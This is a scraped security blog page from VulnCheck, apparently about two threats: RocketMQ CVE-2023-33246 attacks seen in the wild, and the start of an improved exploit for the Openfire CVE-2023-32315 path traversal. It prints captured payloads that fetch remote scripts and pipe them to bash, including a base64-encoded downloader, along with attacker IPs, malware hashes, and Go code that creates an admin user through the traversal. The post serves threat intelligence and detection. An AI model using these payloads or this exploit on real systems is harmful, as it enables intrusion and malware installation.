hex",[1373,89480,1384],{"class":1383},[1373,89482,89483],{"class":1379},"len",[1373,89485,1384],{"class":1383},[1373,89487,11736],{"class":11735},[1373,89489,2230],{"class":1383},[1373,89491,27425],{"class":1397},[1373,89493,55913],{"class":5467},[1373,89495,89496],{"class":1383},")[",[1373,89498,353],{"class":5467},[1373,89500,89501],{"class":1383},":]\n",[1373,89503,89504,89506,89508,89510,89512,89515,89517,89520,89522,89524,89527,89529,89531,89533,89536,89538,89540,89542,89544,89546,89548,89550],{"class":1375,"line":4792},[1373,89505,89427],{"class":4640},[1373,89507,5417],{"class":1397},[1373,89509,37845],{"class":4640},[1373,89511,59],{"class":1383},[1373,89513,89514],{"class":11735},"hex",[1373,89516,16355],{"class":1383},[1373,89518,89519],{"class":11735},"replace",[1373,89521,1384],{"class":1383},[1373,89523,1388],{"class":1387},[1373,89525,89526],{"class":1391},"000000cd000000",[1373,89528,1388],{"class":1387},[1373,89530,5437],{"class":1383},[1373,89532,1388],{"class":1387},[1373,89534,89535],{"class":1391},"000000",[1373,89537,1388],{"class":1387},[1373,89539,15478],{"class":1397},[1373,89541,89473],{"class":11735},[1373,89543,15448],{"class":1397},[1373,89545,4713],{"class":1387},[1373,89547,89535],{"class":1391},[1373,89549,1388],{"class":1387},[1373,89551,11875],{"class":1383},[1373,89553,89554,89556,89558,89560,89562,89564,89566,89568],{"class":1375,"line":4798},[1373,89555,89427],{"class":4640},[1373,89557,5417],{"class":1397},[1373,89559,57298],{"class":9165},[1373,89561,59],{"class":1383},[1373,89563,89436],{"class":11735},[1373,89565,1384],{"class":1383},[1373,89567,11736],{"class":11735},[1373,89569,11875],{"class":1383},[18,89571,89572],{},"Based on that exploit, it seems likely that the type of attacker that would use that script would have no understanding of the underlying protocol that carries the payload into the configuration file. They wouldn't know anyone can download the configuration file and examine the payload.",[18,89574,89575,89576,89580,89581,89584,89585,89589],{},"Using our ",[47,89577,20558],{"href":89578,"rel":89579},"https:\u002F\u002Fpkg.go.dev\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit",[51]," framework, we wrote a tool that will download RocketMQ broker configuration files and extract the vulnerable ",[886,89582,89583],{},"rocketmqHome"," variable. The tool is available on ",[47,89586,2485],{"href":89587,"rel":89588},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Ffetch-broker-conf",[51],", and it can be used to quickly hunt for exploited RocketMQ systems..",[18,89591,89592,89593,89596],{},"There are various ways to provide any go-exploit binary “targets”, but the easiest way to scan many hosts is by using the ",[886,89594,89595],{},"-rhosts-file"," option. The following is an example:",[1354,89598,89600],{"className":31740,"code":89599,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Ffetch-broker-conf$ .\u002Fbuild\u002Fmain_linux-arm64 -a -e -rhosts-file \u002Ftmp\u002Frocketmq.csv -log-json true 2>\u002Fdev\u002Fnull | jq 'select(.msg == \"Extracted the variable\")'\n{\n \"time\": \"2023-08-31T13:45:35.781849255-04:00\",\n \"level\": \"SUCCESS\",\n \"msg\": \"Extracted the variable\",\n \"rocketmqHome\": \"-c $@|sh . echo (curl -s x.x.x.x\u002Frm.sh||wget -q -O- x.x.x.x\u002Frm.sh)|bash;\",\n \"host\": \"x.x.x.x\",\n \"port\": 10909\n}\n{\n \"time\": \"2023-08-31T13:45:39.420484976-04:00\",\n \"level\": \"SUCCESS\",\n \"msg\": \"Extracted the variable\",\n \"rocketmqHome\": \"-c $@|sh . echo (curl -s x.x.x.x\u002Frm.sh||wget -q -O- 45.15.158.124\u002Frm.sh)|bash;\",\n \"host\": \"x.x.x.x\",\n \"port\": 10909\n}\n",[886,89601,89602,89642,89646,89662,89677,89693,89714,89730,89740,89744,89748,89763,89777,89791,89810,89824,89832],{"__ignoreMap":219},[1373,89603,89604,89607,89610,89612,89614,89617,89620,89623,89625,89628,89630,89632,89635,89637,89640],{"class":1375,"line":1376},[1373,89605,89606],{"class":2206},"albinolobster@mournland:~\u002Ffetch-broker-conf$",[1373,89608,89609],{"class":1391}," .\u002Fbuild\u002Fmain_linux-arm64",[1373,89611,74504],{"class":2209},[1373,89613,38907],{"class":2209},[1373,89615,89616],{"class":2209}," -rhosts-file",[1373,89618,89619],{"class":1391}," \u002Ftmp\u002Frocketmq.csv",[1373,89621,89622],{"class":2209}," -log-json",[1373,89624,14986],{"class":7054},[1373,89626,89627],{"class":1397}," 2>",[1373,89629,8857],{"class":1391},[1373,89631,2233],{"class":1397},[1373,89633,89634],{"class":2206}," jq",[1373,89636,4713],{"class":1387},[1373,89638,89639],{"class":1391},"select(.msg == \"Extracted the variable\")",[1373,89641,76063],{"class":1387},[1373,89643,89644],{"class":1375,"line":220},[1373,89645,8904],{"class":1383},[1373,89647,89648,89651,89653,89655,89658,89660],{"class":1375,"line":1266},[1373,89649,89650],{"class":2206}," \"time\"",[1373,89652,4606],{"class":1379},[1373,89654,4883],{"class":1387},[1373,89656,89657],{"class":1391},"2023-08-31T13:45:35.781849255-04:00",[1373,89659,183],{"class":1387},[1373,89661,9062],{"class":1391},[1373,89663,89664,89667,89669,89671,89673,89675],{"class":1375,"line":1852},[1373,89665,89666],{"class":2206}," \"level\"",[1373,89668,4606],{"class":1379},[1373,89670,4883],{"class":1387},[1373,89672,39062],{"class":1391},[1373,89674,183],{"class":1387},[1373,89676,9062],{"class":1391},[1373,89678,89679,89682,89684,89686,89689,89691],{"class":1375,"line":4692},[1373,89680,89681],{"class":2206}," \"msg\"",[1373,89683,4606],{"class":1379},[1373,89685,4883],{"class":1387},[1373,89687,89688],{"class":1391},"Extracted the variable",[1373,89690,183],{"class":1387},[1373,89692,9062],{"class":1391},[1373,89694,89695,89698,89700,89702,89704,89707,89710,89712],{"class":1375,"line":4724},[1373,89696,89697],{"class":2206}," \"rocketmqHome\"",[1373,89699,4606],{"class":1379},[1373,89701,4883],{"class":1387},[1373,89703,17976],{"class":1391},[1373,89705,25359],{"class":89706},"sVMSR",[1373,89708,89709],{"class":1391},"|sh . echo (curl -s x.x.x.x\u002Frm.sh||wget -q -O- x.x.x.x\u002Frm.sh)|bash;",[1373,89711,183],{"class":1387},[1373,89713,9062],{"class":1391},[1373,89715,89716,89719,89721,89723,89726,89728],{"class":1375,"line":4756},[1373,89717,89718],{"class":2206}," \"host\"",[1373,89720,4606],{"class":1379},[1373,89722,4883],{"class":1387},[1373,89724,89725],{"class":1391},"x.x.x.x",[1373,89727,183],{"class":1387},[1373,89729,9062],{"class":1391},[1373,89731,89732,89735,89737],{"class":1375,"line":4768},[1373,89733,89734],{"class":2206}," \"port\"",[1373,89736,4606],{"class":1379},[1373,89738,89739],{"class":5467}," 10909\n",[1373,89741,89742],{"class":1375,"line":4792},[1373,89743,1855],{"class":1383},[1373,89745,89746],{"class":1375,"line":4798},[1373,89747,8904],{"class":1383},[1373,89749,89750,89752,89754,89756,89759,89761],{"class":1375,"line":4806},[1373,89751,89650],{"class":2206},[1373,89753,4606],{"class":1379},[1373,89755,4883],{"class":1387},[1373,89757,89758],{"class":1391},"2023-08-31T13:45:39.420484976-04:00",[1373,89760,183],{"class":1387},[1373,89762,9062],{"class":1391},[1373,89764,89765,89767,89769,89771,89773,89775],{"class":1375,"line":4817},[1373,89766,89666],{"class":2206},[1373,89768,4606],{"class":1379},[1373,89770,4883],{"class":1387},[1373,89772,39062],{"class":1391},[1373,89774,183],{"class":1387},[1373,89776,9062],{"class":1391},[1373,89778,89779,89781,89783,89785,89787,89789],{"class":1375,"line":4825},[1373,89780,89681],{"class":2206},[1373,89782,4606],{"class":1379},[1373,89784,4883],{"class":1387},[1373,89786,89688],{"class":1391},[1373,89788,183],{"class":1387},[1373,89790,9062],{"class":1391},[1373,89792,89793,89795,89797,89799,89801,89803,89806,89808],{"class":1375,"line":4835},[1373,89794,89697],{"class":2206},[1373,89796,4606],{"class":1379},[1373,89798,4883],{"class":1387},[1373,89800,17976],{"class":1391},[1373,89802,25359],{"class":89706},[1373,89804,89805],{"class":1391},"|sh . echo (curl -s x.x.x.x\u002Frm.sh||wget -q -O- 45.15.158.124\u002Frm.sh)|bash;",[1373,89807,183],{"class":1387},[1373,89809,9062],{"class":1391},[1373,89811,89812,89814,89816,89818,89820,89822],{"class":1375,"line":4843},[1373,89813,89718],{"class":2206},[1373,89815,4606],{"class":1379},[1373,89817,4883],{"class":1387},[1373,89819,89725],{"class":1391},[1373,89821,183],{"class":1387},[1373,89823,9062],{"class":1391},[1373,89825,89826,89828,89830],{"class":1375,"line":4849},[1373,89827,89734],{"class":2206},[1373,89829,4606],{"class":1379},[1373,89831,89739],{"class":5467},[1373,89833,89834],{"class":1375,"line":4877},[1373,89835,1855],{"class":1383},[18,89837,89838,89839,89841],{},"By scanning potentially affected systems, we found a variety of malicious payloads. It should be noted that it’s very straightforward for an attacker to overwrite their malicious ",[886,89840,89583],{}," with a benign value, so the attackers we caught aren’t the best out there. Regardless, the following is a small sampling of interesting payloads, associated addresses, and malware hashes.",[993,89843,89845],{"id":89844},"exploit-payloads","Exploit Payloads",[1354,89847,89850],{"className":89848,"code":89849,"language":1359},[1357],"\"rocketmqHome\": \"-c $@|sh . echo curl http:\u002F\u002Fx.x.x.x:8888\u002Fshc | tee \u002Ftmp\u002Fshc;\",\n\"rocketmqHome\": \"-c $@|sh . echo curl --output gr http:\u002F\u002Fx.x.x.x\u002Fbins\u002Fx86; chmod 777 *; .\u002Fgr apache.x86;\",\n\"rocketmqHome\": \"-c $@|sh . echo (curl -s x.x.x.x\u002Frm.sh||wget -q -O- x.x.x.x\u002Frm.sh)|bash;\",\n\"rocketmqHome\": \"-c $@|sh . echo echo \\\"a2VybmVsPSQodW5hbWUgLWEpCmlmIFtbICRrZXJuZWwgPT0gKiJhbWQ2NCIqIF1dIHx8IFtbICRrZXJuZWwgPT0gKiJ4ODZfNjQiKiBdXTsgdGhlbgogICAgZG93bmxvYWRlcj1odHRwOi8vYWNmLXByb2R1Y2FvLnMzLmFtYXpvbmF3cy5jb20vcWZpcG5yZ2t1eGFlagplbGlmIFtbICRrZXJuZWwgPT0gKiJpMzg2IiogXV0gfHwgW1sgJGtlcm5lbCA9PSAqImk2ODYiKiBdXTsgdGhlbgogICAgZG93bmxvYWRlcj1odHRwOi8vYXNobGV5aHViLnMzLmFtYXpvbmF3cy5jb20vd2piZ3NveGhwdnJteQplbGlmIFtbICRrZXJuZWwgPT0gKiJhcm0iKiBdXTsgdGhlbgogICAgZG93bmxvYWRlcj1odHRwOi8vYWFhZHV0eXYxLnMzLmFtYXpvbmF3cy5jb20vcHdrb2RpeWxhaG51dgplbHNlCiAgICBkb3dubG9hZGVyPWh0dHA6Ly9icmF6aWxmb3VuZGF0aW9uLWFzc2V0cy5zMy5hbWF6b25hd3MuY29tL2pubGJldGNvcnFwaGcKZmkKZWNobyAyODk3MTY0MjcgPiAvdG1wLzAKY3VybCAtbyAvdG1wLzEyMyAkZG93bmxvYWRlcgpjaG1vZCAreCAvdG1wLzEyMwpzaCAtYyAvdG1wLzEyMwo=\\\"|base64 -d|bash -i;\",\n\"rocketmqHome\": \"-c $@|sh . echo reboot;\",\n",[886,89851,89849],{"__ignoreMap":219},[993,89853,89855],{"id":89854},"associated-attacker-ip-addresses","Associated Attacker IP Addresses",[1354,89857,89860],{"className":89858,"code":89859,"language":1359},[1357],"103.85.25.121\n94.156.6.110\n45.15.158.124\n134.209.58.230\nacf-producao.s3.amazonaws.com\nashleyhub.s3.amazonaws.com\naaadutyv1.s3.amazonaws.com\nbrazilfoundation-assets.s3.amazonaws.com\n",[886,89861,89859],{"__ignoreMap":219},[993,89863,89865],{"id":89864},"dropped-executable-hashes","Dropped Executable Hashes",[22,89867,89868,89875,89882,89889,89896],{},[25,89869,89870],{},[47,89871,89874],{"href":89872,"rel":89873},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F1d489a41395be76a8101c2e1eba383253a291f4e84a9da389c6b58913786b8ac\u002Fdetection",[51],"1d489a41395be76a8101c2e1eba383253a291f4e84a9da389c6b58913786b8ac",[25,89876,89877],{},[47,89878,89881],{"href":89879,"rel":89880},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fd7843904e1c25055e14cae8b44b28f9dd4706c0ad8b03f55dfcded36ce8423a0\u002Fdetection",[51],"d7843904e1c25055e14cae8b44b28f9dd4706c0ad8b03f55dfcded36ce8423a0",[25,89883,89884],{},[47,89885,89888],{"href":89886,"rel":89887},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F4feb3dcfe57e3b112568ddd1897b68aeb134ef8addd27b660530442ea1e49cbb\u002Fdetection",[51],"4feb3dcfe57e3b112568ddd1897b68aeb134ef8addd27b660530442ea1e49cbb",[25,89890,89891],{},[47,89892,89895],{"href":89893,"rel":89894},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Ff93e9bc9583058d82d2d3fe35117cbb9a553d54e7149846b2dc94446f0836201\u002Fdetection",[51],"f93e9bc9583058d82d2d3fe35117cbb9a553d54e7149846b2dc94446f0836201",[25,89897,89898],{},[47,89899,89902],{"href":89900,"rel":89901},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F49062378ab3e4a0d78c6db662efb4dbc680808fb75834b4674809bc8903adaea\u002Fdetection",[51],"49062378ab3e4a0d78c6db662efb4dbc680808fb75834b4674809bc8903adaea",[61,89904,1903],{"id":1902},[18,89906,89907],{},"To our knowledge, CVE-2023-33246 is only associated with one botnet. However, it’s clear there are at least a few active actors, and even more victims. This is a good opportunity to remove your RocketMQ instance from the internet and to examine the broker configuration for signs of exploitation.",[61,89909,13102],{"id":13101},[18,89911,89912],{},"If you are as interested in exploits, attack surfaces, and vulnerabilities like we are then you might be interested in VulnCheck. Register for a VulnCheck account today by clicking \"Sign in \u002F Join Community\" and schedule a demo to learn more.",[2901,89914,89915],{},"html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .s91G_, html code.shiki .s91G_{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#F8F8F2}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .squCx, html code.shiki .squCx{--shiki-light:#E53935;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .s_MOj, html code.shiki .s_MOj{--shiki-light:#E2931D;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sAZ-3, html code.shiki .sAZ-3{--shiki-light:#6182B8;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sVMSR, html code.shiki .sVMSR{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#FD971F;--shiki-sepia-font-style:italic}",{"title":219,"searchDepth":220,"depth":220,"links":89917},[89918,89919,89920,89921,89922],{"id":89844,"depth":1266,"text":89845},{"id":89854,"depth":1266,"text":89855},{"id":89864,"depth":1266,"text":89865},{"id":1902,"depth":220,"text":1903},{"id":13101,"depth":220,"text":13102},"2023-09-05","VulnCheck demonstrates the use of the RocketMQ remoting protocol to retrieve the broker configuration file, and shares attacker payloads used in the wild for exploitation with CVE-2023-33246.",{"slug":89926},"rocketmq-exploit-payloads","\u002Fblog\u002Frocketmq-exploit-payloads",{"title":83500,"description":89924},"blog\u002Frocketmq-exploit-payloads",[242,23275],"KRGsp_nF1CgZBhKqiBaNb6kW0YgkjcgDbB4JQ_MhI1U",{"id":89933,"title":83439,"articles":89934,"authors":89984,"body":89986,"date":89938,"description":91851,"extension":234,"image":7,"link":7,"meta":91852,"navigation":237,"path":91854,"seo":91855,"series":7,"stem":91856,"subtype":7,"tags":91857,"__hash__":91858},"blog\u002Fblog\u002Fopenfire-cve-2023-32315.md",[89935,89939,89943,89946,89949,89953,89954,89957,89960,89964,89968,89972,89976,89980],{"title":89936,"source":39566,"link":89937,"date":89938},"Cyberespionage, attributed and unattributed. Election interference in Ecuador. Carderbee hits Hong Kong. No breach at auDA. Hacktivism in the hybrid war.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F160","2023-08-22",{"title":89940,"source":14373,"link":89941,"date":89942},"Over 3,000 Openfire servers vulnerable to takover attacks","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fover-3-000-openfire-servers-vulnerable-to-takover-attacks\u002F","2023-08-23",{"title":89944,"source":3494,"link":89945,"date":89942},"Risky Biz News: South Korea is investigating \"spy chip\" in Chinese weather measuring equipment","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Fsouth-korea-is-investigating-chinese-spy-chip",{"title":89947,"source":14378,"link":89948,"date":89942},"3,000 Openfire Servers Exposed to Attacks Targeting Recent Vulnerability","https:\u002F\u002Fwww.securityweek.com\u002F3000-openfire-servers-exposed-to-attacks-targeting-recent-vulnerability\u002F",{"title":89950,"source":61450,"link":89951,"date":89952},"Recent Vulnerability Puts 3,000 Openfire Servers at Risk of Attack","https:\u002F\u002Fwww.cysecurity.news\u002F2023\u002F08\u002Frecent-vulnerability-puts-3000-openfire.html","2023-08-24",{"title":89950,"source":11233,"link":89951,"date":89952},{"title":89955,"source":14390,"link":89956,"date":89952},"Researchers warn that more than 3,000 unpatched Openfire servers are exposed to attacks using an exploit for a recent flaw.","https:\u002F\u002Fsecurityaffairs.com\u002F149811\u002Fbreaking-news\u002Fopenfire-servers-exposed-new-exploit.html",{"title":89958,"source":14382,"link":89959,"date":89952},"Thousands of Unpatched Openfire XMPP Servers Still Exposed to High-Severity Flaw","https:\u002F\u002Fthehackernews.com\u002F2023\u002F08\u002Fthousands-of-unpatched-openfire-xmpp.html",{"title":89961,"source":73072,"link":89962,"date":89963},"Cyber Security Headlines: Lazarus exploits ManageEngine, Rockwell ThinManager vulnerabilities, Mississippi hospital attack","https:\u002F\u002Fcisoseries.com\u002Fcyber-security-headlines-lazarus-exploits-manageengine-rockwell-thinmanager-vulnerabilities-mississippi-hospital-attack\u002F","2023-08-25",{"title":89965,"source":89966,"link":89967,"date":89963},"Cyber Security Today, Week in Review for the week ending Friday, August 25, 2023","IT World Canada’s Cyber Security Today podcast","https:\u002F\u002Fwww.itworldcanada.com\u002Farticle\u002Fcyber-security-today-week-in-review-for-the-week-ending-friday-august-25-2023\u002F545341",{"title":89969,"source":74108,"link":89970,"date":89971},"Weekly Vulnerability Recap – August 28, 2023 – Windows, Ivanti, Adobe Hit By Flaws","https:\u002F\u002Fwww.esecurityplanet.com\u002Ftrends\u002Fweekly-vulnerability-recap-august-28-2023-windows-ivanti-adobe-hit-by-flaws\u002F","2023-08-28",{"title":89973,"source":89974,"link":89975,"date":89971},"GO CRYPTO IN PRACTICE, EXCEL EXECUTES PYTHON, PROTECTING USERS, DARPA DISTILLS – ASW #253","SC Media's Application Security Weekly podcast","https:\u002F\u002Fwww.scmagazine.com\u002Fpodcast-segment\u002Fgo-crypto-in-practice-excel-executes-python-protecting-users-darpa-distills-asw-253",{"title":89977,"source":14373,"link":89978,"date":89979},"Hackers actively exploiting Openfire flaw to encrypt servers","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fhackers-actively-exploiting-openfire-flaw-to-encrypt-servers\u002F","2023-09-26",{"title":89981,"source":65365,"link":89982,"date":89983},"China-linked hackers target governments and more in Southeast Asia with new backdoors","https:\u002F\u002Ftherecord.media\u002Fearth-krahang-china-linked-espionage-group-new-backdoors","2024-03-19",[89985],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":89987,"toc":91843},[89988,89990,90014,90029,90037,90040,90043,90045,90067,90073,90076,90081,90085,90088,90091,90095,90108,90466,90472,90478,90481,90487,90490,90493,90502,90511,90517,90539,91198,91205,91223,91230,91236,91239,91246,91255,91262,91265,91278,91454,91457,91539,91545,91551,91554,91560,91563,91566,91764,91767,91770,91773,91780,91786,91797,91803,91809,91812,91819,91824,91826,91832,91835,91837,91840],[61,89989,11648],{"id":11647},[18,89991,89992,89997,89998,90003,90004,10515,90008,90013],{},[47,89993,89996],{"href":89994,"rel":89995},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-32315",[51],"CVE-2023-32315"," is a path traversal vulnerability affecting the ",[47,89999,90002],{"href":90000,"rel":90001},"https:\u002F\u002Fwww.igniterealtime.org\u002Fprojects\u002Fopenfire\u002F",[51],"Openfire"," admin console. Openfire is a ",[47,90005,30087],{"href":90006,"rel":90007},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FOpenfire",[51],[47,90009,90012],{"href":90010,"rel":90011},"https:\u002F\u002Fgithub.com\u002Figniterealtime\u002FOpenfire",[51],"open-source"," chat server, and according to the current maintainers, Ignite Realtime, the server software has been downloaded almost 9 million times.",[18,90015,90016,90017,90022,90023,90028],{},"This vulnerability has flown under the radar on the defensive side of the industry. CVE-2023-32315 has been ",[47,90018,90021],{"href":90019,"rel":90020},"https:\u002F\u002Fwww.surevine.com\u002Fopenfire-cve-2023-32315-what-we-know\u002F",[51],"exploited in the wild",", but you won’t find it in the CISA KEV catalog. There has also been minimal discussion about indicators of compromise and very few detections (although to their credit, Ignite Realtime put out ",[47,90024,90027],{"href":90025,"rel":90026},"https:\u002F\u002Fgithub.com\u002Figniterealtime\u002FOpenfire\u002Fsecurity\u002Fadvisories\u002FGHSA-gw42-f939-fhvm",[51],"patches"," and a great mitigation guide back in May).",[18,90030,90031,90032,90036],{},"On the offensive side, things have been more robust. You can find quite a few public exploits. There are some major differences between these exploits, but generally, they all follow a simple pattern: Use the path traversal to create an administrative user, log in, and then upload a plugin to achieve code execution. This process is typically manual, although ",[47,90033,36852],{"href":90034,"rel":90035},"https:\u002F\u002Fraw.githubusercontent.com\u002Frapid7\u002Fmetasploit-framework\u002Fmaster\u002Fmodules\u002Fexploits\u002Fmulti\u002Fhttp\u002Fopenfire_auth_bypass_rce_cve_2023_32315.rb",[51]," uploads the plugin programmatically).",[18,90038,90039],{},"What’s particularly interesting about this is that creating the administrative user isn’t necessary, but it’s re-implemented over and over again. Worse, not only is it not required, but it significantly increases the amount of logging the attacker introduces.",[18,90041,90042],{},"In this blog, we’ll demonstrate an improved exploit for CVE-2023-32315, learn how to craft an Openfire plugin webshell, examine indicators of compromise, and share network detections.",[61,90044,88415],{"id":88414},[18,90046,90047,90048,90052,90053,10515,90058,90062,90063,90066],{},"To start, we want to establish that this vulnerability is still prevalent in the wild. At the time of writing, we see approximately 6,300 servers on ",[47,90049,41731],{"href":90050,"rel":90051},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=html%3A%22jive-loginVersion%22",[51],". Censys shows a ",[47,90054,90057],{"href":90055,"rel":90056},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=INCLUDE&q=services.http.response.body_hash%3D%22sha1%3Ac44f746e0ba05d036d47e56afb7981d8bdf0a366%22",[51],"bit",[47,90059,81313],{"href":90060,"rel":90061},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=INCLUDE&q=services.http.response.favicons.md5_hash%3D%22e4888ee8491b4eb75501996e41af6460%22",[51],", but it doesn’t follow the redirect to ",[886,90064,90065],{},"login.jsp"," making the queries a little more dicey.",[18,90068,90069],{},[68,90070],{":width":10862,"alt":90071,"src":90072},"Openfire instances on Shodan","\u002Fblog\u002Fopenfire-cve-2023-32315\u002Fshodan-openfire.png",[18,90074,90075],{},"Openfire exposes the installed version on the login page. To determine just how widely exploitable this vulnerability is, we did a version scan of the servers on Shodan. Openfire put out three patched versions: 4.6.8, 4.7.5, and 4.8.0. Approximately 20% of the servers had upgraded to those versions.",[1925,90077,90078],{},[18,90079,90080],{},"Openfire Versions Indexed by Shodan",[78559,90082],{":labels":90083,":values":90084},"[\"Patched\",\"Too Old\",\"Forks\",\"Affected\"]","[20,25,5,50]",[18,90086,90087],{},"This doesn’t mean the remaining 80% are using affected versions. Openfire says the first affected version is 3.10.0, released in April 2015. Any version released before then is not vulnerable, and these older versions make up nearly 25% of the internet-facing Openfire servers. Of those, the most popular version is 3.7.1,released in 2011. You could assume those are mostly honeypots, but we can’t be sure.",[18,90089,90090],{},"We found there are a variety of Openfire forks that may or may not be vulnerable, making up about 5% of the internet-facing servers. This leaves approximately 50% of the internet-facing Openfire servers using affected versions. While that’s only a few thousand servers, it's a decent number given the server’s trusted position associated with chat clients.",[61,90092,90094],{"id":90093},"impacts-of-a-user-less-exploit","Impacts of a User-less Exploit",[18,90096,90097,90098,90101,90102,90107],{},"Current public exploits start by using the traversal to reach ",[886,90099,90100],{},"user-create.jsp"," to create an administrative user. There are quite a few exploits at this point, but as far as I can tell, the first public exploit to establish an admin user was published on June 14 as ",[47,90103,90106],{"href":90104,"rel":90105},"https:\u002F\u002Fgithub.com\u002Ftangxiaofeng7\u002FCVE-2023-32315-Openfire-Bypass",[51],"tangxiaofeng7\u002FCVE-2023-32315-Openfire-Bypass"," on GitHub (at least five days after the first in-the-wild exploitation). Written in Go, the admin creation looks like this:",[1354,90109,90111],{"className":19022,"code":90110,"language":19024,"meta":219,"style":219},"username := generateRandomString(6)\npassword := generateRandomString(6)\n\ncreateUserUrl := fmt.Sprintf(\"%s\u002Fsetup\u002Fsetup-s\u002F%%u002e%%u002e\u002F%%u002e%%u002e\u002Fuser-create.jsp?csrf=%s&username=%s&name=&email=&password=%s&passwordConfirm=%s&isadmin=on&create=%%E5%%88%%9B%%E5%%BB%%BA%%E7%%94%%A8%%E6%%88%%B7\", t, csrf, username, password, password)\nres, err = rawhttp.Get(createUserUrl)\n\nm := map[string][]string{\"Cookie\": {\"JSESSIONID=\" + jsessionid, \"csrf=\" + csrf}}\n\nres, err = rawhttp.DoRaw(\"GET\", createUserUrl, \"\", m, nil)\nif err != nil {\n fmt.Println(err)\n 